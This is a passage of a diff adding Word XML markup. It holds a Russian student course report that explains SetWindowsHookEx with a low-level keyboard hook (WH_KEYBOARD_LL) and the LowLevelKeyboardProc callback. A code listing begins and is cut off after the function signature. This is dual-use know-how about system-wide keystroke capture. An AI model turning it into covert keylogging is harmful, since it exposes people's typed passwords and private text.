+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HOOKPROC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lpfn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HINSTANCE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hMod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dwThreadId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает определяемую программой процедуру фильтра (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>) в цепочку фильтров (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>idHook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>] Определяет тип устанавливаемой процедуры фильтра (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>В курсовом проекте у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ся процедура фильтра (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WH_KEYBOARD_LL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, которая осуществляет текущий контроль за низкоуровневыми событиями ввода данных с клавиатуры.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Lpfn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>] Указатель на процедуру фильтра (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). Если параметр </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>dwThreadId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> равняется нулю или устанавливает идентификатор потока, созданного другим процессом, параметр </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>lpfn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> должен указывать на процедуру фильтра (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) в динамически подключаемой библиотеке (DLL). В противном случае, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>lpfn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> может указывать на процедуру фильтра (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>) в коде, связанном с текущим процессом.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hMod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>] Дескриптор DLL, содержащий процедуры фильтра (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), на которую указывает параметр </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>lpfn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.  параметр </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hMod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> должен быть установлен в ПУСТО (NULL), </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>если  параметр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>dwThreadId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> устанавливает поток, созданный текущим процессом, и если процедура фильтра (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>) находится внутри кода, связанного с текущим процессом.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>dwThreadId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] Устанавливает </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>идентификатор потока</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> с которым, процедура фильтра (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>) должна быть связана. Если этот параметр равняется нулю, процедура фильтра (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>) связывается со всеми существующими потоками, запущенными на том же самом рабочем столе, что и вызывающий поток.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>LRESULT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CALLB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ACK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LowLevelKeyboardProc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WPARAM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LPARAM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">истема вызывает эту функцию каждый раз, когда собирается вставить новое событие ввода с клавиатуры в очередь ввода данных потока. Ввод с клавиатуры может исходить от локального драйвера клавиатуры или от вызовов функции </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>keybd_event</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>wParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>] Устанавливает идентификатор сообщения клавиатуры.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>] Указатель на структуру KBDLLHOOKSTRUCT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Листинг функции </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LowLevelKeyboardProc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">LRESULT CALLBACK </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LowLevelKeyboardHook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
